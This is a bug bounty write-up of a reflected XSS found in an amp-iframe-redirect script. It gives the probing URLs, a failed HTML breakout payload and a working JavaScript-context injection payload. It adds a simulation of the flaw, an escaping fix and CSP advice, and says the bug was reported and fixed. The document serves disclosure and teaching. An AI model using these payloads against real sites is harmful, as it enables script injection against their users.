Ali TÜTÜNCÜ
2 min read · Oct 7, 2018

My First 0day Exploit (Reflected XSS) #BUGBOUNTY

Hi guys!

Steps:

1. When I went to https://example.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=0, I saw this code block:

2. Then I thought about which characters I could use, so I went to: https://example.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy="'<>/();

Then I saw that I could not use </script><img src=v onerror=alert(1)> to get XSS. I thought I would not be able to bypass the filter, but that maybe I could add JavaScript instead, and get XSS that way. After researching JavaScript for a while, I created the required block of code:

); alert(document.domain); if (1

When I went to https://example.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=); alert(document.domain); if (1 , I saw the XSS alert ;)
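The write-up does not show the vulnerable script or its filter, so the following is an added example (not the author's code and not the amp-iframe-redirect script) that models the situation the steps above imply: the redirect_strategy parameter is written unquoted into a function call inside an inline script, and the filter HTML-encodes the characters the probe in step 2 showed as unusable (< > " ') while leaving ( ) ; alone. The function name redirectWithStrategy, the stubbed browser globals and the sample values are assumptions. The model shows why the `</script>` breakout fails (it no longer parses), why the author's payload works (the leading `)` closes the call, `alert()` runs, and `if (1` absorbs the template's own trailing `)` so the script stays syntactically valid), and what the same template looks like once the value is emitted as a properly escaped JavaScript string literal.

```javascript
// Added example, not the original page's or the vulnerable script's code.
// Models an inline script that interpolates the redirect_strategy parameter
// unquoted into a function call and HTML-encodes only < > " ' (an assumption
// consistent with the probe in step 2; the real filter is not on the page).

// Assumed filter: encodes the four characters the probe showed as unusable,
// but leaves ( ) ; untouched, so the JavaScript context is still breakable.
function htmlEncodeQuotesAndAngles(s) {
  const map = { '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[<>"']/g, c => map[c]);
}

// Vulnerable template (hypothetical function name redirectWithStrategy).
function vulnerableScript(redirectStrategy) {
  return `redirectWithStrategy(${htmlEncodeQuotesAndAngles(redirectStrategy)});`;
}

// Hardened template: the value becomes a JSON string literal, with < > and the
// U+2028/U+2029 line terminators escaped so it can never close the <script>
// tag or break out of the literal, whatever ( ) ; it contains.
function jsStringLiteral(s) {
  return JSON.stringify(s)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function hardenedScript(redirectStrategy) {
  return `redirectWithStrategy(${jsStringLiteral(redirectStrategy)});`;
}

// Compiles and runs a generated inline script with stubbed browser globals,
// recording alert() calls, what the redirect function received, and any
// compile or runtime error. Stands in for the browser loading the page.
function run(script) {
  const result = { alerts: [], strategies: [], error: null };
  const globals = {
    alert: msg => result.alerts.push(String(msg)),
    document: { domain: 'example.com' },
    redirectWithStrategy: v => result.strategies.push(v),
  };
  try {
    new Function(...Object.keys(globals), script)(...Object.values(globals));
  } catch (e) {
    result.error = e.constructor.name;
  }
  return result;
}

const PAYLOAD = '); alert(document.domain); if (1';

// Walks through the states from the write-up and returns them for inspection.
function demo() {
  return {
    // Benign value: the call receives 0 and nothing else happens.
    benign: run(vulnerableScript('0')),
    // The HTML breakout attempt is neutralised: < and > are encoded, so the
    // generated script is no longer valid JavaScript and never runs.
    htmlBreakout: run(vulnerableScript('</script><img src=v onerror=alert(1)>')),
    // The author's payload closes the call, runs alert(), and opens `if (1`
    // so the template's own trailing `)` becomes part of a valid statement.
    jsBreakout: run(vulnerableScript(PAYLOAD)),
    // Same payload against the hardened template: delivered as a plain string.
    hardened: run(hardenedScript(PAYLOAD)),
  };
}

console.log(vulnerableScript(PAYLOAD));
console.log(hardenedScript(PAYLOAD));
console.log(demo());
```

Escaping the value as a JavaScript string literal is the minimal fix for this template; the more robust pattern is to keep untrusted values out of inline script entirely (a data attribute or a JSON blob in a `<script type="application/json">` element read by the page's own code) and to ship a CSP that disallows inline script.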

Some popular companies use this script, for example:

  • Shopify
  • Canva
  • Yelp
  • Western Union
  • Cuvva, etc.

I reported it to the developer's bug bounty program, and it has since been fixed.

If you want to get notifications about more of my work, this is my Twitter account:

https://twitter.com/alicanact60